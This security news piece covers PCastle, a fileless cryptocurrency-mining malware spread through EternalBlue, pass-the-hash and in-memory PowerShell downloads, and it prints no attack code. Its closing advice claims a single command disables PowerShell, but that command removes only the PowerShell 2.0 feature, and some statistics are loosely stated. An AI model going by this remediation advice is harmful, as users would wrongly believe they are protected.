Mainstream Anti-malware vendor, Trend Micro recently revealed the existence of project PCastle, a Monero-based cryptocurrency mining malware launched against China powered by its fileless feature. Once again, the favorite tool of hackers: Windows PowerShell. Other than the developers and system administrators, PowerShell is one of the least features used by a non-technical end-user, but a frequently taken advantage of malware authors. PCastle’s largest install base is 92%, all Chinese computers, but no specific industry targets were seen.
Like the WannaCry ransomware of 2017, PCastle also has a module that takes advantage of the EternalBlue exploit as part of its propagation strategy. If the machine is patched against the mentioned exploit (patch is available even with Windows XP), PCastle will instead resort to “pass the hash” in order to brute-force install itself deep in the Windows Operating System. The moment it steals the admin privilege from the logged-in user account, it will then trick the computer to create a scheduled task and Windows registry entries to write instructions for the computer to download the malware’s main module, again using PowerShell scripting.
The downloaded scripts are not written to the file system, instead, it operates itself only on RAM. This makes it difficult to detect, given the “fileless” nature of the infection. The only antivirus that contains an advanced heuristics scanning capability can potentially block the installation of the malware’s main module to the memory of the computer. Since RAM’s contents are automatically flushed every reboot, the scheduled task program of Windows is hijacked by the malware to automatically install itself again to memory at a specific interval of time.
It will perform a self-check to determine persistence even after a reboot, the moment that is guaranteed, it will again tap the Windows PowerShell to download the cryptocurrency miner module from the command and control servers. The version of the cryptocurrency miner installed by PowerShell will vary depending on the architecture of the machine. Both 32-bits and 64-bits version of the Monero mining module are available, with 32-bit Windows receiving a 32-bit Monero mining module, while 64-bit Windows is paired with a 64-bit module.
“Algorithms for Monero mining are not as resource-intensive compared to other miners, and don’t require a lot of processing power. This means they can illicitly mine the cryptocurrency without alerting users unless they notice certain red flags like performance issues,” explained Janus Agcaoli, Trend Micro’s Threat Response Engineer in their official blog.
Upon further inspection, Trend Micro’s engineers found out that the PowerShell script downloads its malicious files from the following command and control servers, which also serves as the malware’s “software repository”:
Trend Micro is strongly recommending for PowerShell to be disabled, as it is not needed by home users and non-technical end-users. PowerShell being available for default on all versions of Windows 10 places all its users to huge risks. We also strongly recommend our readers using Windows 10 to disable PowerShell, as it is just a command line interface that is more feature rich than CMD.exe but is not needed by an ordinary user.
The easiest way to disable PowerShell is to open Powershell with administrative privilege, copy and paste the below code and press the enter key on the keyboard: Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root